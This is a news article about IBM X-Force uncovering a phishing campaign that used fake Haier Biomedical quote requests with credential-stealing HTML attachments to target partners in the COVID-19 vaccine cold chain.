IBM Uncovers Hacking Effort Targeting COVID Vaccine Logistics System
IBM researchers have uncovered a large-scale hacking attempt to infiltrate the "cold chain" logistics effort for distributing the COVID-19 vaccine. The perpetrator has not been identified, but the methods are sophisticated and the scope of the attack is unusually broad. It is not known if it was successful in its goals.
IBM's "Security X-Force" found a large-scale phishing effort targeting multiple companies, agencies and other partners in the Cold Chain Equipment Optimization Platform (CCEOP) - an initiative launched by vaccination alliance Gavi and the United Nations Children Fund (UNICEF) in 2015. CCEOP was set up to strengthen the vaccine supply chain in the developing world by procuring refrigeration equipment en masse; more recently, it has also been involved in the effort to prepare for COVID-19 vaccine distribution. The first coronavirus vaccine approved in the West, made by Pfizer, must be kept at temperatures below -75 F during transport and storage.
The phishing emails targeted members of this alliance, and they "appeared" to originate from an executive at Chinese refrigeration supplier Haier Biomedical, which specializes in complete cold chain solutions. Each email contained a request for quotation related to the CCEOP program, along with a malicious HTML attachment that would prompt the recipient to enter their credentials. The researchers believe that the hacker's goal was to steal credentials in order to gain unauthorized access to the recipients' systems. This would give the attacker access to processes, methods and plans for transporting the COVID-19 vaccine, including government distribution infrastructure.
The targets were chosen with care, including companies that make solar panels (used for powering refrigerators in developing countries), dry ice (used for cooling vaccines during transport), and IT and software companies that support pharmaceutical manufacturers and container transport companies.
"A breach within any part of this global alliance [CCEOP] could result in the exposure of numerous partner computing environments worldwide," assessed IBM X-Force. "While attribution is currently unknown, the precision targeting and nature of the specific targeted organizations potentially point to nation-state activity. Without a clear path to a cash-out, cyber criminals are unlikely to devote the time and resources required to execute such a calculated operation with so many interlinked and globally distributed targets."
The U.S. Department of Homeland Security has sent out an alert to oganizations and companies involved in the storage and transportation of the vaccine to watch for similar activity.